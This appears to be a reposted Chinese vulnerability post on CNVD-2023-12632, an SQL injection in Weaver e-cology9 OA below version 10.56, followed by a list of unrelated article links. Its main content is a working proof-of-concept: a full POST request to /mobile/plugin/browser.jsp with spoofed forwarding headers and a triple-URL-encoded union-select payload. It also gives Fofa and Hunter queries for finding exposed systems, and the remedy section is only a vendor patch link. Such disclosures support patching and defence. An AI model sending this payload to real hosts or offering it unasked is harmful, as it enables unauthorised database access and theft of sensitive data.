当前位置: 首页 > news >正文

CNVD-2023-12632 泛微e-cology9 sql注入 附poc

目录

  • 漏洞描述
  • 影响版本
  • 漏洞复现
  • 漏洞修复

漏洞描述

泛微 E-Cology9 协同办公系统是一套基于 JSP 及 SQL Server 数据库的 OA 系统,包括知识文档管理、人力资源管理、客户关系管理、项目管理、财务管理、工作流程管理、数据中心等打造协同高效的企业管理环境,突破企业人、财、物、信息、流程等各种资源之间的屏障,并将集团各企业、企业各部门、各分支机构、以及企业与外部的供应商、分销商、客户及其他合作伙伴等整合在一个统一的平台上,使企业变成一个电子化的内外部协同工作的组织。
由于泛微e-cology9中对用户前台输入的数据未做校验,可以通过构造恶意的数据包导致SQL注入漏洞,进一步获取敏感数据。


影响版本

泛微e-cology V9 < 10.56


漏洞复现

Fofa:app="泛微-协同商务系统"
Hunter:title=="泛微-协同软件的精英团队,我们的目标:造就协同软件第一品牌!"

查询数据库版本信息,执行语句需要进行三次url编码。
在这里插入图片描述POC:

POST /mobile/plugin/browser.jsp HTTP/1.1
Host: x.x.x.x
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.110 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
x-forwarded-for: 127.0.0.1
x-originating-ip: 127.0.0.1
x-remote-ip: 127.0.0.1
x-remote-addr: 127.0.0.1
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 649isDis=1&browserTypeId=269&keyword=%2525%2536%2531%2525%2532%2537%2525%2532%2530%2525%2537%2535%2525%2536%2565%2525%2536%2539%2525%2536%2566%2525%2536%2565%2525%2532%2530%2525%2537%2533%2525%2536%2535%2525%2536%2563%2525%2536%2535%2525%2536%2533%2525%2537%2534%2525%2532%2530%2525%2533%2531%2525%2532%2563%2525%2532%2537%2525%2532%2537%2525%2532%2562%2525%2532%2538%2525%2535%2533%2525%2534%2535%2525%2534%2563%2525%2534%2535%2525%2534%2533%2525%2535%2534%2525%2532%2530%2525%2534%2530%2525%2534%2530%2525%2535%2536%2525%2534%2535%2525%2535%2532%2525%2535%2533%2525%2534%2539%2525%2534%2566%2525%2534%2565%2525%2532%2539%2525%2532%2562%2525%2532%2537

批量检测脚本:
在这里插入图片描述


漏洞修复

官方修复方案:
https://www.weaver.com.cn/cs/securityDownload.asp#

http://www.lryc.cn/news/48363.html

相关文章:

  • 赛宁网安合作伙伴大会成功举办,重磅发布SCBaaS服务!
  • R语言 4.2.2安装包下载及安装教程
  • 快速玩转 CNStack 2.0 流量防护
  • 你还在用原生 poi 处理 excel?太麻烦了来瞧瞧这个
  • No.027<软考>《(高项)备考大全》【第11章】项目风险管理
  • mit6.824 lab2c-数据持久化
  • leaflet使用L.geoJSON加载文件,参数filter的使用方法(127)
  • 23年5月高项学习笔记7—— 质量管理
  • 学编程需要哪些基础呢?一起来看看吧
  • PECS In Java泛型类型通配符限定之<? extends T>与<? super T>
  • 电子招投标系统源码之了解电子招标投标全流程
  • admin Tips
  • ToBeWritten之Radare2 使用教程
  • 实时翻译屏幕插件
  • 代码随想录算法训练营第二天| 977,209,59
  • echarts 地图板块点击着色,移除着色
  • Visual Studio Code (vscode)自定义用户代码段快速打出for循环等
  • RocketMQ客户端配置详解
  • STM32基于STM32CubeMX DMA + EXTI读取DS1307数据
  • C#中的枚举器和迭代器
  • 中山大学人工智能学院——考研上岸经验贴
  • ThreeJS-圣诞节表白3D贺卡(三十)
  • 040:cesium加载World Terrain地形图
  • 逻辑运算和位移指令
  • 大家现在都去做Linux运维了吗?
  • Webpack的编译流程是怎么样的?webpack是如何工作的?
  • 【ZOJ 1151】Word Reversal 题解(字符串+模拟)
  • Dart语言操作符?和!的用法
  • 聚类 kmeans | 机器学习
  • 求职咨询Job Information